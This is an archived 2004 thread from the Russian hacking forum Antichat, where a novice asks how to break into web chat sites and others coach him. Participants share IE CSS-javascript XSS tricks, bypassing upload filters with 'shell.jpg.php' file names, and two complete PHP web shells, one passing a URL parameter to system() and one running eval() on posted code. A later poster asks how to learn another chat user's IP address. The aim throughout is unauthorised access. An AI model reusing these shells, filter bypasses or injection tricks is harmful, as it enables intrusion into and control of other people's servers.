Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   НаучитЕ (https://forum.antichat.xyz/showthread.php?t=2868)

---Zak--- 06.10.2004 02:11

ЛюдИ - научите меня взламывать ЧаТы...
Что для этого нужно иметь у ссебя на компе.

В общем ...Я в ВАШИХ руках ...

zFailure 06.10.2004 14:00

не в компе, а в голове - мозги!
изучить надо
html, css, js, трюки в ie, php / cgi (perl), db

---Zak--- 08.10.2004 02:07

2 zFailure
Изучил ... не знаю - что за трюки в ip и db ...
А так ЗНАЮ - давайте УЧИТЕ ... Плиzzz

zFailure 08.10.2004 07:47

трюки не в ip, а в ie (он же internet explorer)
например: background:url(javascript:....)
вообщем на этом сайте есть статья посвященная этому

db оно же database ну sql короче

Fr1k 08.10.2004 09:55

---Zak--- всё приходит с опытом!!! А вообще больше читай вышеописанного!

ntking 10.10.2004 01:35

Куча мозгов не помогут, если нет фантазииhttp://forum.antichat.ru/iB_html/non...icons/wink.gif
Ну и конечно некоторых знаний...

Morph 11.10.2004 18:44

Главное научись понимать HTML ,а остальное придет современем!

zFailure 11.10.2004 19:52

2 Morph
ну в этом HTML коде согласись мало смысла!
<img src="http://...1234567890"z=`">
` style=`background:url(javascript:...)`

хотя работает!

Morph 11.10.2004 20:19

Ты про чо непонял?Я нынче тугой(Шутка)

Morph 11.10.2004 20:20

Нет посути ведь чаты ломать HTML знать надо!Может не прав?Хотя думаю прав

zFailure 12.10.2004 00:03

2 Morph
прав на половину, точнее на одну треть!
ну бедешь ты знать HTML, ну разбудят тебя в 3 часа ночи и ты сможешь наизусь рассказать спецификацию XHTML 1.0, но чат то ты все равно не сможешь взломать! http://forum.antichat.ru/iB_html/non...icons/turn.gif

---Zak--- 12.10.2004 02:07

В общем НАРОД... HTML я знаю как свои 5-ть пальцев ... САМ сайты создаю ...

Трюки типа ЭтогО я поже делать умею и воображение у меня есть  http://forum.antichat.ru/iB_html/non...cons/smile.gif

НЕ могли бы вы на конкретном ПРИМЕРе ... показать -объястнить - разъястнить ... ?

zFailure 12.10.2004 07:46

2 Zak
ну если так, то тебе осталось посмотреть пару видео о вломе чатов и прочитать пару статей про чаты и IE

---Zak--- 15.10.2004 02:05

2 zFailure
ОкИ ... будем смотреть ...

---Zak--- 16.10.2004 08:17

ТАК ... прочитал почти ВсЕ, что у ВАС тут есть ...
Не помогает или до меня не доходит.
В общем предложите мне на каком-нибудь ЧаТе потренироваться ... только без подстав  http://forum.antichat.ru/iB_html/non...cons/smile.gif

---Zak--- 17.10.2004 05:50

А могу ли я сам себя взломать, т.е. у меня установленно Apache ...
Нампример - установить у себя 2 хоста:
На один из них закачать с какого-нибудь сайта скрипт ЧаТа (chat.ru)
А на другом например будут все мои скрипты ? (narod.ru)

ВОТ я так попробовал, но только у меня не установленна mySQL...
И при попытке из php вызвать скрипт:
<?
if (!empty($_GET['c'])) {
echo '<pre>';
system($_GET['c']);
echo '</pre>';
exit;
}
?>
то в окне у меня становиться "слишком" чисто - ничего на нем нет - пусто.
Прописываю .php?c=|c -| все равно пусто ... хотя же должно появиться содержимое папки.
Хотя remview.php работает ...

Просто у меня возник вопрос - можно самого себя ?
И еще можно не делать копии на сервере, а закачивать к себе на сервер ?

2 zFailure
Можно еще где-нибудь на сайте написать функции, которые ВЫ пишите в адресе после ".php?" с объяснениями.

zFailure 17.10.2004 12:27

не во первых не .php?c=|c -|
а .php?c=lc -l (L - маленькая)

во вторых сомневаюсь что у тебя стоит UNIX система
тогда .php?c=dir

это не функции а команды
открой любой справочник по UNIX, ты найдешь их там
а если есть UNIX то заглени в папку /bin
они все лежат там

---Zak--- 20.10.2004 02:35

Можно ломануть через url ... но тут у меня вопрос можно ли ломануть через "обзор", т.е. на сайте предлагается закачать картинку со своего компа.
Вопрос: Можно закачать снифер с себе на диск и после этого залить его на сервер ?

zFailure 20.10.2004 10:07

если скрипт ничего не скажет на расширение php то можно!
иногда програмери делают тупую проверку
типа такого
if (strpos('.jpg',s)) {
...

тогда прокатит такая фича
shell.jpg.php

если на сайте есть местная php иньекция, то и расширение можно оставить .jpg, а потом просто подключить!

geks 20.10.2004 17:56

zFailure

Что за инъекция, напиши!
http://forum.antichat.ru/iB_html/non...cons/smile.gif))

---Zak--- 21.10.2004 02:38

А можно я ВАШ снифер себе скачаю ? ... залью к себе на сайт, у менявозникла идея из статьи "Взлом чатов by Algol. Теория и Практика." - "Всякая всячина" ...

... А вот можно пользоваться через remview.php, а не через ваши скрипы...

<?
$gpc = get_magic_quotes_gpc();
if (!empty($_POST['c'])) { $c = $gpc ? stripslashes($_POST['c']) : $_POST['c']; }
else { $c = NULL; }
?>
<form action="" method="post"><textarea cols="80" rows="30" name="c" id="c"><?=$c; ?></textarea>
<br><input type="submit"></form>
<?
if (!is_null($c)) eval($c);
?>

и т.д. ВСЕ равно ведь shell тама тоже есть ...

... ВОТ дошел я до того, что нашел админку для ЧАТА ... Voodoo Chat Administration. Где-то по моему была у ВАС статья о взломе, но чего-то я забыл... ладненько будем "тренироваться" ...

25.10.2004 16:17

Помогите пожалуйста
Как я могу узнать ip-адрес человека в чате(но я не модер этого чата и не создатель )?
Поэтому мне нужна помощь.
Может у кого-то есть програмки - или может кто-то подсказать что надо делать - пожалуйста  http://forum.antichat.ru/iB_html/non...s/rolleyes.gif  http://forum.antichat.ru/iB_html/non...ticons/sad.gif


Время: 04:49